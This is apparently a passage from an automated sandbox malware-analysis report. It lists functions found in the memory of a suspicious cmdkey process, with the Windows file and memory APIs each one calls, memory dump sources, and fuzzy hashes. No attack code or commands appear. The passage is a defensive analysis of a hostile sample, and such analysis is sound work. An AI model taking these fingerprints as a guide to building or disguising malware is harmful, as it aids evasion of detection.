                                                  Function 00A4C710 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 00A4C7F4
                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 00A4C82F
                                                  • FindClose.KERNELBASE(?), ref: 00A4C83A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNext
                                                  • String ID:
                                                  • API String ID: 3541575487-0
                                                  • Opcode ID: ac8801ece7700f1a3c013b012581bab5bd498beee54a32e0a4f61266fc43e11f
                                                  • Instruction ID: 97bf29375ed1c1cbc8378e28a69968ab70dbe8824f1683084b3235ed2dd8a91b
                                                  • Opcode Fuzzy Hash: ac8801ece7700f1a3c013b012581bab5bd498beee54a32e0a4f61266fc43e11f
                                                  • Instruction Fuzzy Hash: 743172B5A00308BBDB60EFA0CD85FFF777CAB84715F144459B908A7191DA70AA84CBA0
                                                  Function 00A59200 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,48BBEA40,?,?,?,?), ref: 00A59301
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 7cb9cc546ed493f20ed36a4ab2e9223a943d12665cbcef7ff238bf32946d0558
                                                  • Instruction ID: dea062f1c80a2e017ac113de72b54b6d96ecf3879f3e76583394a42f7e8014e9
                                                  • Opcode Fuzzy Hash: 7cb9cc546ed493f20ed36a4ab2e9223a943d12665cbcef7ff238bf32946d0558
                                                  • Instruction Fuzzy Hash: FD31C0B5A00208AFCB14DF98C981EEEB7F9EF8C314F108219F919A7341D730A851CBA5
                                                  Function 00A59370 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtReadFile.NTDLL(?,?,?,?,?,?,48BBEA40,?,?), ref: 00A59456
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 51a1490dc5bbe649167750b4b5e61c81b200366f79915bb8788afccde69a0b38
                                                  • Instruction ID: f0446beed5c3987dcd0bfbfc47ad35b5f9fc83c35479eaa88ab45d75cec8c409
                                                  • Opcode Fuzzy Hash: 51a1490dc5bbe649167750b4b5e61c81b200366f79915bb8788afccde69a0b38
                                                  • Instruction Fuzzy Hash: 2831E3B5A00208AFCB14DF98C881EEFB7B9EF88714F108219FD18A7345D734A911CBA5
                                                  Function 00A59670 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00A41E3E,?,00A5813F,00000000,00000004,00003000,?,?,?,?,?,00A5813F,00A41E3E), ref: 00A59738
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: 99c28b6f836bd7f1fb3103be4ba1a38a236ed1443ace24b26726f51e3104ef92
                                                  • Instruction ID: 4547eebd367ad63eb15dbfd304677b2b34b54359a4443d730fcfab75c4c3c4bf
                                                  • Opcode Fuzzy Hash: 99c28b6f836bd7f1fb3103be4ba1a38a236ed1443ace24b26726f51e3104ef92
                                                  • Instruction Fuzzy Hash: 632108B5A00208AFDB10DF98CC81EEF77B9EF88700F108209FD18AB241D734A911CBA5
                                                  Function 00A59460 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  • Opcode ID: e27229d037b06a3256107adad20ad3048269b43c53fba6a8d67c1a7a5e616ca3
                                                  • Instruction ID: 7c457f4de5119c2c9bdf6a8f88fa511bb9c3512c87cb7c1483a2c1f90ff2c6e9
                                                  • Opcode Fuzzy Hash: e27229d037b06a3256107adad20ad3048269b43c53fba6a8d67c1a7a5e616ca3
                                                  • Instruction Fuzzy Hash: 9C11A371A00204BED620EB64CC42FEF77ACEF84714F108109FD18A7281D77479068BB5
                                                  Function 00A59500 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00A59534
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 1d059be34a1983e242e36b498dc5b26b0b02f47ccae493070fbce90df4a1fadc
                                                  • Instruction ID: 16a783c9a2ee7c0d79ac81bfb170d8e7620f31c239a90deac70b94c1a93f9c8c
                                                  • Opcode Fuzzy Hash: 1d059be34a1983e242e36b498dc5b26b0b02f47ccae493070fbce90df4a1fadc
                                                  • Instruction Fuzzy Hash: 95E08C76200214BBC620FA59DC01F9B7BACDFC5720F518415FA0CA7242C674B915C7F4
                                                  Function 03454260 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 743b8acba3bd9f0d6045f8c7a51f3daa37f62981b2463e9f368ceaf4325b7a60
                                                  • Instruction ID: 949a3445982cc140b57f4727b90347cab4fff5a17840a22858b450e23a9c7d6b
                                                  • Opcode Fuzzy Hash: 743b8acba3bd9f0d6045f8c7a51f3daa37f62981b2463e9f368ceaf4325b7a60
                                                  • Instruction Fuzzy Hash: EF900231605404129580B5584984546410597E0305B51D416E0414954CCB248D566367
                                                  Function 03454570 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 5a08c5fbf436db568711184f7a8460c945837234e44a7dbad33a6687e18352b6
                                                  • Instruction ID: 1dc1ee60cfccf6780fb5f982420b1a586d83b9714d4778d03cffcbad07e6839f
                                                  • Opcode Fuzzy Hash: 5a08c5fbf436db568711184f7a8460c945837234e44a7dbad33a6687e18352b6
                                                  • Instruction Fuzzy Hash: A3900261601104424580B5584904406610597E1305391D51AA0544960CC7288C55A26F
                                                  Function 034534E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: b5da4f75c7e9599a3222dc80a78a4d4b3481014d48ecf2798afcf49068f6cd71
                                                  • Instruction ID: 67aac8d29140c2da67a6c538bb753bcf0b9293dcabff7c9553d8e0ea76a867ab
                                                  • Opcode Fuzzy Hash: b5da4f75c7e9599a3222dc80a78a4d4b3481014d48ecf2798afcf49068f6cd71
                                                  • Instruction Fuzzy Hash: 1290023160510802D540A5584614706110587D0205F61D816A0414968DC7A58D5175A7
                                                  Function 03452B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 3c4c39568355b53f4f87326e0c92f6a0cd180d92a0e95dfda80a3eed6f64bdac
                                                  • Instruction ID: 9fa2bcc9435096aa07d2573d13377da1cfd952c0b5ac1edb15a2f86693b05e8b
                                                  • Opcode Fuzzy Hash: 3c4c39568355b53f4f87326e0c92f6a0cd180d92a0e95dfda80a3eed6f64bdac
                                                  • Instruction Fuzzy Hash: 9A90023120504C42D580B5584504A46011587D0309F51D416A0054A94DD7358D55B667
                                                  Function 03452B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ba9355549c2aeaf97935d333abbf2c2a948112ffa3889c8a81181b6f524ec31d
                                                  • Instruction ID: 45a741a2340b23121ec7e5d537e2d93f50f2da481222a7a00ec288b531bb5721
                                                  • Opcode Fuzzy Hash: ba9355549c2aeaf97935d333abbf2c2a948112ffa3889c8a81181b6f524ec31d
                                                  • Instruction Fuzzy Hash: F290023120100C02D5C0B558450464A010587D1305F91D41AA0015A54DCB258E5977A7
                                                  Function 03452BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 950fd2a08bf2b57342d038fe613b16f0fddd9b627ee5cadb104b25f61db4e217
                                                  • Instruction ID: d21421ed29839efe5c9771c0c56e358defa41a4d6982761fc1f9c395ff421050
                                                  • Opcode Fuzzy Hash: 950fd2a08bf2b57342d038fe613b16f0fddd9b627ee5cadb104b25f61db4e217
                                                  • Instruction Fuzzy Hash: 4B90023120100802D540A9985508646010587E0305F51E416A5014955EC7758C917137
                                                  Function 03452B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: c05bcbe40bd36bb526b2311b23af6077932b80301cb069739e2096a68aa1355a
                                                  • Instruction ID: cfd26b9ccee15116e05dde01a7cce2c734ac9bdfea55246f5824dd00b30ab41b
                                                  • Opcode Fuzzy Hash: c05bcbe40bd36bb526b2311b23af6077932b80301cb069739e2096a68aa1355a
                                                  • Instruction Fuzzy Hash: D690023120100C42D540A5584504B46010587E0305F51D41BA0114A54DC725CC517527
                                                  Function 03452B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: daa2844bf58193548ec9bca1e80cc56454d95e62368b389729f7c349b4f470d7
                                                  • Instruction ID: a938c0115f1f94b21e833694483e0b9e285973f02496c0727728cfd4a9f8fb63
                                                  • Opcode Fuzzy Hash: daa2844bf58193548ec9bca1e80cc56454d95e62368b389729f7c349b4f470d7
                                                  • Instruction Fuzzy Hash: E690023120108C02D550A558850474A010587D0305F55D816A4414A58DC7A58C917127
                                                  Function 03452A10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a53e0e4b622d70c1e09b3695c9989f7ca09d8c9ad586b395b2c4a73185cf3c3c
                                                  • Instruction ID: f9528016a88c91110a40a6be58eb1191775be7a1e89e4e26ba987ec1634850fd
                                                  • Opcode Fuzzy Hash: a53e0e4b622d70c1e09b3695c9989f7ca09d8c9ad586b395b2c4a73185cf3c3c
                                                  • Instruction Fuzzy Hash: E6900225221004020585E958070450B054597D6355391D41AF1406990CC7318C656327
                                                  Function 03452AC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: b0f0a9725947634dbf07f60ca071caf106dd8d891d66181556b78a14e6e01afb
                                                  • Instruction ID: ae63f832bfb2a88c01b102544046f192a774939d6625e93d7fd13befeb8bec6b
                                                  • Opcode Fuzzy Hash: b0f0a9725947634dbf07f60ca071caf106dd8d891d66181556b78a14e6e01afb
                                                  • Instruction Fuzzy Hash: D690023160500C02D590B5584514746010587D0305F51D416A0014A54DC7658E5576A7
                                                  Function 03452A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: f18478a01cc26289584651de888bf851a55f5b4d871d0cd5231ec279fc8ef171
                                                  • Instruction ID: 6b43fe2f5ca367cf85bb97d235eb8a8f4da0dc450e08a487b9a2de58ed678fd2
                                                  • Opcode Fuzzy Hash: f18478a01cc26289584651de888bf851a55f5b4d871d0cd5231ec279fc8ef171
                                                  • Instruction Fuzzy Hash: FE900261202004034545B5584514616410A87E0205B51D426E1004990DC7358C91712B
                                                  Function 034529F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: dd7bd1e17ee74467ab0ea74afa063a7d9469ce7f8da013661aadfeba580e05c0
                                                  • Instruction ID: 849ca16b8967a24824fefa1f765f1fef9926108d1ad14e0293c0193574b481dd
                                                  • Opcode Fuzzy Hash: dd7bd1e17ee74467ab0ea74afa063a7d9469ce7f8da013661aadfeba580e05c0
                                                  • Instruction Fuzzy Hash: 2D900435311004030545FD5C07045070147C7D5355351D437F1005D50CD731CC717137
                                                  Function 034538D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6b356f5aa686fdd10625463cd9d307cbcfeb291f684d115ffdfed6c5831d20b3
                                                  • Instruction ID: 9318ebc15179912a483e8a47eddef40cd58a8ccc1a7a6451902594a5d48f1b02
                                                  • Opcode Fuzzy Hash: 6b356f5aa686fdd10625463cd9d307cbcfeb291f684d115ffdfed6c5831d20b3
                                                  • Instruction Fuzzy Hash: 5890022124505502D590B55C45046164105A7E0205F51D426A0804994DC7658C557227
                                                  Function 03452F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6106bc5574459450fcfcff40170425f52babc2ea1666293f747553a13c89baea
                                                  • Instruction ID: 0d72fe67856386d20ed62f9302b90046a279c75f1e9ec51c918478e6a107e698
                                                  • Opcode Fuzzy Hash: 6106bc5574459450fcfcff40170425f52babc2ea1666293f747553a13c89baea
                                                  • Instruction Fuzzy Hash: D890022121180442D640A9684D14B07010587D0307F51D51AA0144954CCB258C616527
                                                  Function 03452E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 32719123fdf77483877f29324104fd28504862c808bab949b85778c2e3d35842
                                                  • Instruction ID: 539895a4954a20e97574da6f888456e285a6b29d4f1f98cbbeded3d619211c9d
                                                  • Opcode Fuzzy Hash: 32719123fdf77483877f29324104fd28504862c808bab949b85778c2e3d35842
                                                  • Instruction Fuzzy Hash: E190026134100842D540A5584514B060105C7E1305F51D41AE1054954DC729CC52712B
                                                  Function 03452E00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: e6b9b9daabeb93a6ab51b24948badd996b74d02ba5719886f78e8881809e1e93
                                                  • Instruction ID: 70fd4da229c540169663173fef7e476f642ad39fceefdee5a25125737f9728e0
                                                  • Opcode Fuzzy Hash: e6b9b9daabeb93a6ab51b24948badd996b74d02ba5719886f78e8881809e1e93
                                                  • Instruction Fuzzy Hash: B390026120140803D580A9584904607010587D0306F51D416A2054955ECB398C51713B
                                                  Function 03452ED0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 34ec324df28dafa8f85b94836622a27178ef623419aabea4301c740e953255f4
                                                  • Instruction ID: 793d33c4354c77c4ff7b1836a109da4157cb3f03306b9d1880100ea168ed1cd8
                                                  • Opcode Fuzzy Hash: 34ec324df28dafa8f85b94836622a27178ef623419aabea4301c740e953255f4
                                                  • Instruction Fuzzy Hash: B1900221601004424580B56889449064105ABE1215751D526A0988950DC7698C65666B
                                                  Function 03452D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8ed90acf90f78dc65cd2208a845a921633ee3ac81cab7df3e6eb12e62a83ad0b
                                                  • Instruction ID: 2794544e63f627df48b5c5a06a63b8dc08ecea64266260053075f92cf79375c3
                                                  • Opcode Fuzzy Hash: 8ed90acf90f78dc65cd2208a845a921633ee3ac81cab7df3e6eb12e62a83ad0b
                                                  • Instruction Fuzzy Hash: C790023120100813D551A5584604707010987D0245F91D817A0414958DD7668D52B127
                                                  Function 03452DA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8af4e67d956db252d505e13cf3ca4409a4d76856f2fdfa1ccbe5e0614a854753
                                                  • Instruction ID: 183a2f448085cb4bf135eeee1f0e3c9913af4b23d7bedf8efa6095cb74a262c5
                                                  • Opcode Fuzzy Hash: 8af4e67d956db252d505e13cf3ca4409a4d76856f2fdfa1ccbe5e0614a854753
                                                  • Instruction Fuzzy Hash: 3B90022160100902D541B5584504616010A87D0245F91D427A1014955ECB358D92B137
                                                  Function 03452C50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
